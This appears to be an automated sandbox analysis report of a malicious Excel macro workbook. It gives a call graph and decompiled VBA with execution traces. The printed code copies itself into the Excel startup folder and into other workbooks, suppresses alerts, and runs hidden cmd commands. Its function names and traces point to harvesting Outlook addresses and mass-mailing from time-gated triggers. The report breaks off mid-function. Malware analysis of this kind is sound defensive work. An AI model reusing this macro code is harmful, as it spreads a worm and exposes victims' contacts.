                                                                                                                                                    Path:C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:attrib -S -h "C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"
                                                                                                                                                    Imagebase:0xc30000
                                                                                                                                                    File size:19456 bytes
                                                                                                                                                    MD5 hash:A5540E9F87D4CB083BDF8269DEC1CFF9
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                                    Disassembly

                                                                                                                                                    Code Analysis

                                                                                                                                                    Call Graph

                                                                                                                                                    • Entrypoint
                                                                                                                                                    • Decryption Function
                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    • Show Help
                                                                                                                                                    callgraph 22 Workbook_open 286 do_what Path:1,Application:1 22->286 34 xx_workbookOpen 306 copystart VBProject:1 34->306 69 auto_open Path:1,Save:1 113 copytoworkbook VBComponents:1 69->113 252 delete_this_wk VBComponents:1,VBProject:1 69->252 914 Movemacro4 UserName:1,Now:1,Select:7,Chr:2,Application:1, Name:2 69->914 653 Microsofthobby Path:2,vbMinimizedFocus:3,Shell:3,FullName:1,Close:1 286->653 772 OpenDoor Version:1,CreateObject:1,Application:1 286->772 1076 ActionJudge RegRead:1,CDate:1,Now:3,UCase:1,CreateObject:1, InStr:1,DateAdd:4 286->1076 3578 RestoreAfterOpen Delete:1,Value:1,InStr:1,Range:1,Name:2 286->3578 340 copymodule vbNullString:2,Number:4,Err:4,Trim:1,Environ:1, VBComponents:4,Mid:1,vbNormal:1,InStrRev:2, Dir:1,Kill:2,Clear:2 306->340 1050 WorkbookOpen Len:1 653->1050 872 WReg RegWrite:2,CreateObject:1 772->872 x 4 1258 search_in_OL Replace:2,Left:1,Len:1,FreeFile:2,Run:1, CreateObject:2,Folderexists:1,vbHide:1,Name:2 1076->1258 2147 CreatCab_SendMail Path:12,Replace:2,Left:2,FreeFile:2,Run:8, vbHide:8,Name:2,Len:2,DoEvents:1, CurDir:1,CreateObject:2,Folderexists:2,FileExists:4 1076->2147 3020 if_outlook_open Description:1,InStr:1 1076->3020 3209 ReadOut Close:1,CreateObject:1 1076->3209 x 3 3244 CreateFile Write:2,Left:2,Len:2,Close:2,CreateObject:1, Folderexists:1,FileExists:1 1076->3244 x 3 2928 Massive_SendMail Print:1,DoEvents:4,CreateObject:1,SendKeys:1 2147->2928 3141 get_ten_address LBound:1,UBound:2,Split:2 2147->3141 3348 RestoreBeforeSend Delete:2,Left:2,Len:2,Select:1,Rnd:2, Split:1,Chr:4,Range:1,Int:2, Name:6 2147->3348 2147->3578 2928->3020 3053 RadomNine Rnd:1,Int:1 3141->3053 3141->3209

                                                                                                                                                    Module: Sheet1

                                                                                                                                                    Declaration
                                                                                                                                                    LineContent
                                                                                                                                                    1

                                                                                                                                                    Attribute VB_Name = "Sheet1"

                                                                                                                                                    2

                                                                                                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                                                                                    3

                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                    4

                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                    5

                                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                                    6

                                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                                    7

                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                    8

                                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                                    Module: ThisWorkbook

                                                                                                                                                    Declaration
                                                                                                                                                    LineContent
                                                                                                                                                    1

                                                                                                                                                    Attribute VB_Name = "ThisWorkbook"

                                                                                                                                                    2

                                                                                                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                                                                                    3

                                                                                                                                                    Attribute VB_GlobalNameSpace = False

                                                                                                                                                    4

                                                                                                                                                    Attribute VB_Creatable = False

                                                                                                                                                    5

                                                                                                                                                    Attribute VB_PredeclaredId = True

                                                                                                                                                    6

                                                                                                                                                    Attribute VB_Exposed = True

                                                                                                                                                    7

                                                                                                                                                    Attribute VB_TemplateDerived = False

                                                                                                                                                    8

                                                                                                                                                    Attribute VB_Customizable = True

                                                                                                                                                    9

                                                                                                                                                    Public WithEvents xx As Application

                                                                                                                                                    10

                                                                                                                                                    Attribute xx.VB_VarHelpID = -1

                                                                                                                                                    Executed Functions

                                                                                                                                                    Subroutine

                                                                                                                                                    Workbook_openAPIs: 4, Strings: 0, Number of lines: 6, Relevance: 7.506

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    DisplayAlerts

                                                                                                                                                    Part of subcall function do_what@ToDOLE: Path

                                                                                                                                                    Part of subcall function do_what@ToDOLE: StartupPath

                                                                                                                                                    Part of subcall function do_what@ToDOLE: Application

                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    11

                                                                                                                                                    Private Sub Workbook_open()

                                                                                                                                                    12

                                                                                                                                                    Set xx = Application

                                                                                                                                                    executed
                                                                                                                                                    13

                                                                                                                                                    On Error Resume Next

                                                                                                                                                    14

                                                                                                                                                    Application.DisplayAlerts = False

                                                                                                                                                    DisplayAlerts

                                                                                                                                                    15

                                                                                                                                                    Call do_what()

                                                                                                                                                    16

                                                                                                                                                    End Sub

                                                                                                                                                    Subroutine

                                                                                                                                                    xx_workbookOpenAPIs: 6, Strings: 1, Number of lines: 8, Relevance: 10.508

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    AddFromGuid

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    DisplayAlerts

                                                                                                                                                    Part of subcall function copystart@ToDOLE: Workbooks

                                                                                                                                                    Part of subcall function copystart@ToDOLE: VBProject

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "{0002E157-0000-0000-C000-000000000046}"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    17

                                                                                                                                                    Private Sub xx_workbookOpen(ByVal wb as Workbook)

                                                                                                                                                    18

                                                                                                                                                    On Error Resume Next

                                                                                                                                                    executed
                                                                                                                                                    19

                                                                                                                                                    wb.VBProject.References.AddFromGuid GUID := "{0002E157-0000-0000-C000-000000000046}", Major := 5, Minor := 3

                                                                                                                                                    AddFromGuid

                                                                                                                                                    22

                                                                                                                                                    Application.ScreenUpdating = False

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    23

                                                                                                                                                    Application.DisplayAlerts = False

                                                                                                                                                    DisplayAlerts

                                                                                                                                                    24

                                                                                                                                                    copystart wb

                                                                                                                                                    25

                                                                                                                                                    Application.ScreenUpdating = True

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    26

                                                                                                                                                    End Sub

                                                                                                                                                    Module: ToDOLE

                                                                                                                                                    Declaration
                                                                                                                                                    LineContent
                                                                                                                                                    1

                                                                                                                                                    Attribute VB_Name = "ToDOLE"

                                                                                                                                                    Executed Functions

                                                                                                                                                    Subroutine

                                                                                                                                                    ActionJudgeAPIs: 151, Strings: 22, Number of lines: 38, Relevance: 354.038

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    CreateObject

                                                                                                                                                    		CreateObject("WScript.Shell")

                                                                                                                                                    InStr

                                                                                                                                                    		InStr(""C:\PROGRA~2\MICROS~1\OFFICE16\OUTLOOK.EXE" -C IPM.NOTE /MAILTO "%1"","OUTLOOK.EXE") -> 32

                                                                                                                                                    UCase

                                                                                                                                                    RegRead

                                                                                                                                                    Time

                                                                                                                                                    T1

                                                                                                                                                    T2

                                                                                                                                                    T3

                                                                                                                                                    T4

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: OpenTextFile

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: ReadAll

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: Close

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Folderexists

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Left

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Len

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: CreateFolder

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Left

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Len

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: FileExists

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: OpenTextFile

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Write

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Close

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: OpenTextFile

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Write

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Close

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: Folderexists

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: CreateFolder

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: Replace

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: Left

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: Name

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: Len

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: FreeFile

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: Open

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: FreeFile

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: Open

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: WindowState

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: xlMaximized

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: Run

                                                                                                                                                    Part of subcall function search_in_OL@ToDOLE: vbHide

                                                                                                                                                    Part of subcall function if_outlook_open@ToDOLE: InstancesOf

                                                                                                                                                    Part of subcall function if_outlook_open@ToDOLE: InStr

                                                                                                                                                    Part of subcall function if_outlook_open@ToDOLE: Description

                                                                                                                                                    Time

                                                                                                                                                    T2

                                                                                                                                                    DateAdd

                                                                                                                                                    T4

                                                                                                                                                    DateAdd

                                                                                                                                                    Now

                                                                                                                                                    CDate

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: OpenTextFile

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: ReadAll

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: Close

                                                                                                                                                    Now

                                                                                                                                                    DateAdd

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: OpenTextFile

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: ReadAll

                                                                                                                                                    Part of subcall function ReadOut@ToDOLE: Close

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Folderexists

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Left

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Len

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: CreateFolder

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Left

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Len

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: FileExists

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: OpenTextFile

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Write

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Close

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: OpenTextFile

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Write

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Close

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Folderexists

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Left

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Len

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: CreateFolder

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Left

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Len

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: FileExists

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: OpenTextFile

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Write

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Close

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: OpenTextFile

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Write

                                                                                                                                                    Part of subcall function CreateFile@ToDOLE: Close

                                                                                                                                                    Now

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: CreateObject

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Folderexists

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: CreateFolder

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Replace

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Left

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Name

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Len

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: FreeFile

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Open

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Len

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Path

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: FreeFile

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Open

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: ScreenUpdating

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: SaveCopyAs

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: CurDir

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: ChDrive

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Left

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Path

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: ChDir

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Path

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Run

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Environ$

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Path

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: vbHide

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: FileExists

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Path

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: DoEvents

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Run

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Environ$

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Path

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: vbHide

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Run

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Environ$

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Path

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: vbHide

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Run

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Environ$

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Path

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: vbHide

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Run

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Environ$

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Path

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: vbHide

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Run

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Environ$

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: vbHide

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Folderexists

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: CreateFolder

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Run

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Environ$

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: vbHide

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: ChDir

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: vbCrLf

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Run

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: Environ$

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: vbHide

                                                                                                                                                    Part of subcall function CreatCab_SendMail@ToDOLE: ScreenUpdating

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "10:00:00"
                                                                                                                                                    "11:00:00"
                                                                                                                                                    "14:00:00"
                                                                                                                                                    "15:00:00"
                                                                                                                                                    "WScript.Shell"
                                                                                                                                                    "HKEY_CLASSES_ROOT\mailto\shell\open\command\"
                                                                                                                                                    "OUTLOOK.EXE"
                                                                                                                                                    "1"
                                                                                                                                                    "D:\Collected_Address:frag1.txt"
                                                                                                                                                    "1"
                                                                                                                                                    "D:\Collected_Address:frag1.txt"
                                                                                                                                                    "1"
                                                                                                                                                    "D:\Collected_Address:frag1.txt"
                                                                                                                                                    "n"
                                                                                                                                                    "n"
                                                                                                                                                    "D:\Collected_Address:frag2.txt"
                                                                                                                                                    """"
                                                                                                                                                    "D:\Collected_Address\log.txt"
                                                                                                                                                    "n"
                                                                                                                                                    """"
                                                                                                                                                    "D:\Collected_Address:frag1.txt"
                                                                                                                                                    "D:\Collected_Address:frag2.txt"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    267

                                                                                                                                                    Private Sub ActionJudge()

                                                                                                                                                    268

                                                                                                                                                    Const T1 as Date = "10:00:00"

                                                                                                                                                    executed
                                                                                                                                                    269

                                                                                                                                                    Const T2 as Date = "11:00:00"

                                                                                                                                                    270

                                                                                                                                                    Const T3 as Date = "14:00:00"

                                                                                                                                                    271

                                                                                                                                                    Const T4 as Date = "15:00:00"

                                                                                                                                                    272

                                                                                                                                                    Dim SentTime as Date, WshShell

                                                                                                                                                    274

                                                                                                                                                    Set WshShell = CreateObject("WScript.Shell")

                                                                                                                                                    CreateObject("WScript.Shell")

                                                                                                                                                    executed
                                                                                                                                                    275

                                                                                                                                                    If Not InStr(UCase(WshShell.RegRead("HKEY_CLASSES_ROOT\mailto\shell\open\command\")), "OUTLOOK.EXE") > 0 Then

                                                                                                                                                    InStr(""C:\PROGRA~2\MICROS~1\OFFICE16\OUTLOOK.EXE" -C IPM.NOTE /MAILTO "%1"","OUTLOOK.EXE") -> 32

                                                                                                                                                    UCase

                                                                                                                                                    RegRead

                                                                                                                                                    executed
                                                                                                                                                    275

                                                                                                                                                    Exit Sub

                                                                                                                                                    275

                                                                                                                                                    Endif

                                                                                                                                                    277

                                                                                                                                                    If Time >= T1 And Time <= T2 Or Time >= T3 And Time <= T4 Then

                                                                                                                                                    Time

                                                                                                                                                    T1

                                                                                                                                                    T2

                                                                                                                                                    T3

                                                                                                                                                    T4

                                                                                                                                                    278

                                                                                                                                                    If ReadOut("D:\Collected_Address:frag1.txt") = "1" Then

                                                                                                                                                    279

                                                                                                                                                    Exit Sub

                                                                                                                                                    280

                                                                                                                                                    Else

                                                                                                                                                    281

                                                                                                                                                    CreateFile "1", "D:\Collected_Address:frag1.txt"

                                                                                                                                                    282

                                                                                                                                                    search_in_OL

                                                                                                                                                    283

                                                                                                                                                    Endif

                                                                                                                                                    284

                                                                                                                                                    Else

                                                                                                                                                    285

                                                                                                                                                    If Not if_outlook_open Then

                                                                                                                                                    285

                                                                                                                                                    Exit Sub

                                                                                                                                                    285

                                                                                                                                                    Endif

                                                                                                                                                    286

                                                                                                                                                    If Time > T2 And Time <= DateAdd("n", 10, T2) Or Time > T4 And Time <= DateAdd("n", 10, T4) Then

                                                                                                                                                    Time

                                                                                                                                                    T2

                                                                                                                                                    DateAdd

                                                                                                                                                    T4

                                                                                                                                                    287

                                                                                                                                                    Exit Sub

                                                                                                                                                    288

                                                                                                                                                    Else

                                                                                                                                                    289

                                                                                                                                                    SentTime = DateAdd("n", - 21, Now)

                                                                                                                                                    DateAdd

                                                                                                                                                    Now

                                                                                                                                                    290

                                                                                                                                                    On Error Goto timeError

                                                                                                                                                    291

                                                                                                                                                    SentTime = CDate(ReadOut("D:\Collected_Address:frag2.txt"))

                                                                                                                                                    CDate

                                                                                                                                                    291

                                                                                                                                                    timeError:

                                                                                                                                                    293

                                                                                                                                                    If Now < DateAdd("n", 20, SentTime) Or ReadOut("D:\Collected_Address\log.txt") = "" Then

                                                                                                                                                    Now

                                                                                                                                                    DateAdd

                                                                                                                                                    294

                                                                                                                                                    Exit Sub

                                                                                                                                                    295

                                                                                                                                                    Else

                                                                                                                                                    296

                                                                                                                                                    CreateFile "", "D:\Collected_Address:frag1.txt"

                                                                                                                                                    297

                                                                                                                                                    CreateFile Now, "D:\Collected_Address:frag2.txt"

                                                                                                                                                    Now

                                                                                                                                                    298

                                                                                                                                                    CreatCab_SendMail

                                                                                                                                                    299

                                                                                                                                                    Endif

                                                                                                                                                    300

                                                                                                                                                    Endif

                                                                                                                                                    301

                                                                                                                                                    Endif

                                                                                                                                                    302

                                                                                                                                                    End Sub

                                                                                                                                                    Function

                                                                                                                                                    MicrosofthobbyAPIs: 26, Strings: 5, Number of lines: 20, Relevance: 76.02

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    FullName

                                                                                                                                                    StartupPath

                                                                                                                                                    Part of subcall function WorkbookOpen@ToDOLE: Len

                                                                                                                                                    Part of subcall function WorkbookOpen@ToDOLE: Workbooks

                                                                                                                                                    Path

                                                                                                                                                    StartupPath

                                                                                                                                                    Close

                                                                                                                                                    Shell

                                                                                                                                                    		Shell("C:\Windows\system32\cmd.exe /c attrib -S -h "C:\Users\hardz\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"",2) -> 5164

                                                                                                                                                    Environ$

                                                                                                                                                    StartupPath

                                                                                                                                                    vbMinimizedFocus

                                                                                                                                                    Shell

                                                                                                                                                    		Shell("C:\Windows\system32\cmd.exe /c Del /F /Q "C:\Users\hardz\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"",2) -> 5148

                                                                                                                                                    Environ$

                                                                                                                                                    StartupPath

                                                                                                                                                    vbMinimizedFocus

                                                                                                                                                    Shell

                                                                                                                                                    		Shell("C:\Windows\system32\cmd.exe /c RD /S /Q "C:\Users\hardz\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"",2) -> 2508

                                                                                                                                                    Environ$

                                                                                                                                                    StartupPath

                                                                                                                                                    vbMinimizedFocus

                                                                                                                                                    Path

                                                                                                                                                    StartupPath

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    IsAddin

                                                                                                                                                    SaveCopyAs

                                                                                                                                                    IsAddin

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "k4.xls"
                                                                                                                                                    "k4.xls"
                                                                                                                                                    "comspec"
                                                                                                                                                    "comspec"
                                                                                                                                                    "comspec"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    174

                                                                                                                                                    Function Microsofthobby()

                                                                                                                                                    175

                                                                                                                                                    Dim myfile0 as String

                                                                                                                                                    executed
                                                                                                                                                    176

                                                                                                                                                    Dim MyFile as String

                                                                                                                                                    177

                                                                                                                                                    On Error Resume Next

                                                                                                                                                    178

                                                                                                                                                    myfile0 = ThisWorkbook.FullName

                                                                                                                                                    FullName

                                                                                                                                                    179

                                                                                                                                                    MyFile = Application.StartupPath & "\k4.xls"

                                                                                                                                                    StartupPath

                                                                                                                                                    180

                                                                                                                                                    If WorkbookOpen("k4.xls") And ThisWorkbook.Path <> Application.StartupPath Then

                                                                                                                                                    Path

                                                                                                                                                    StartupPath

                                                                                                                                                    180

                                                                                                                                                    Workbooks("k4.xls").Close False

                                                                                                                                                    Close

                                                                                                                                                    180

                                                                                                                                                    Endif

                                                                                                                                                    181

                                                                                                                                                    Shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocus

                                                                                                                                                    Shell("C:\Windows\system32\cmd.exe /c attrib -S -h "C:\Users\hardz\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"",2) -> 5164

                                                                                                                                                    Environ$

                                                                                                                                                    StartupPath

                                                                                                                                                    vbMinimizedFocus

                                                                                                                                                    executed
                                                                                                                                                    182

                                                                                                                                                    Shell Environ$("comspec") & " /c Del /F /Q """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocus

                                                                                                                                                    Shell("C:\Windows\system32\cmd.exe /c Del /F /Q "C:\Users\hardz\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"",2) -> 5148

                                                                                                                                                    Environ$

                                                                                                                                                    StartupPath

                                                                                                                                                    vbMinimizedFocus

                                                                                                                                                    executed
                                                                                                                                                    183

                                                                                                                                                    Shell Environ$("comspec") & " /c RD /S /Q """ & Application.StartupPath & "\K4.XLS""", vbMinimizedFocus

                                                                                                                                                    Shell("C:\Windows\system32\cmd.exe /c RD /S /Q "C:\Users\hardz\AppData\Roaming\Microsoft\Excel\XLSTART\K4.XLS"",2) -> 2508

                                                                                                                                                    Environ$

                                                                                                                                                    StartupPath

                                                                                                                                                    vbMinimizedFocus

                                                                                                                                                    executed
                                                                                                                                                    185

                                                                                                                                                    If ThisWorkbook.Path <> Application.StartupPath Then

                                                                                                                                                    Path

                                                                                                                                                    StartupPath

                                                                                                                                                    186

                                                                                                                                                    Application.ScreenUpdating = False

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    187

                                                                                                                                                    ThisWorkbook.IsAddin = True

                                                                                                                                                    IsAddin

                                                                                                                                                    188

                                                                                                                                                    ThisWorkbook.SaveCopyAs MyFile

                                                                                                                                                    SaveCopyAs

                                                                                                                                                    189

                                                                                                                                                    ThisWorkbook.IsAddin = False

                                                                                                                                                    IsAddin

                                                                                                                                                    190

                                                                                                                                                    Application.ScreenUpdating = True

                                                                                                                                                    ScreenUpdating

                                                                                                                                                    191

                                                                                                                                                    Endif

                                                                                                                                                    192

                                                                                                                                                    End Function

                                                                                                                                                    Function

                                                                                                                                                    if_outlook_openAPIs: 3, Strings: 4, Number of lines: 10, Relevance: 20.01

                                                                                                                                                    APIsMeta Information

                                                                                                                                                    InstancesOf

                                                                                                                                                    InStr

                                                                                                                                                    		InStr("System Idle Process","OUTLOOK") -> 0 InStr("System","OUTLOOK") -> 0 InStr("Registry","OUTLOOK") -> 0 InStr("smss.exe","OUTLOOK") -> 0 InStr("csrss.exe","OUTLOOK") -> 0 InStr("wininit.exe","OUTLOOK") -> 0 InStr("winlogon.exe","OUTLOOK") -> 0 InStr("services.exe","OUTLOOK") -> 0 InStr("lsass.exe","OUTLOOK") -> 0 InStr("fontdrvhost.exe","OUTLOOK") -> 0 InStr("svchost.exe","OUTLOOK") -> 0 InStr("dwm.exe","OUTLOOK") -> 0 InStr("Memory Compression","OUTLOOK") -> 0 InStr("spoolsv.exe","OUTLOOK") -> 0 InStr("sihost.exe","OUTLOOK") -> 0 InStr("ctfmon.exe","OUTLOOK") -> 0 InStr("explorer.exe","OUTLOOK") -> 0 InStr("dllhost.exe","OUTLOOK") -> 0 InStr("ShellExperienceHost.exe","OUTLOOK") -> 0 InStr("SearchUI.exe","OUTLOOK") -> 0 InStr("RuntimeBroker.exe","OUTLOOK") -> 0 InStr("smartscreen.exe","OUTLOOK") -> 0 InStr("HxTsr.exe","OUTLOOK") -> 0 InStr("backgroundTaskHost.exe","OUTLOOK") -> 0 InStr("WmiPrvSE.exe","OUTLOOK") -> 0 InStr("OhWVeHpNWZADqjAysytYuDWIvYtNJU.exe","OUTLOOK") -> 0

                                                                                                                                                    Description

                                                                                                                                                    StringsDecrypted Strings
                                                                                                                                                    "Win32_Process"
                                                                                                                                                    "WinMgmts:"
                                                                                                                                                    "OUTLOOK"
                                                                                                                                                    "OUTLOOK"
                                                                                                                                                    LineInstructionMeta Information
                                                                                                                                                    592

                                                                                                                                                    Private Function if_outlook_open() as Boolean

                                                                                                                                                    593

                                                                                                                                                    Set objs = GetObject("WinMgmts:").InstancesOf("Win32_Process")

                                                                                                                                                    InstancesOf

                                                                                                                                                    executed
                                                                                                                                                    594

                                                                                                                                                    if_outlook_open = False

                                                                                                                                                    595

                                                                                                                                                    For Each obj in objs

                                                                                                                                                    596

                                                                                                                                                    If InStr(obj.Description, "OUTLOOK") > 0 Then

                                                                                                                                                    InStr("System Idle Process","OUTLOOK") -> 0

                                                                                                                                                    Description

                                                                                                                                                    executed
                                                                                                                                                    597

                                                                                                                                                    if_outlook_open = True

                                                                                                                                                    598

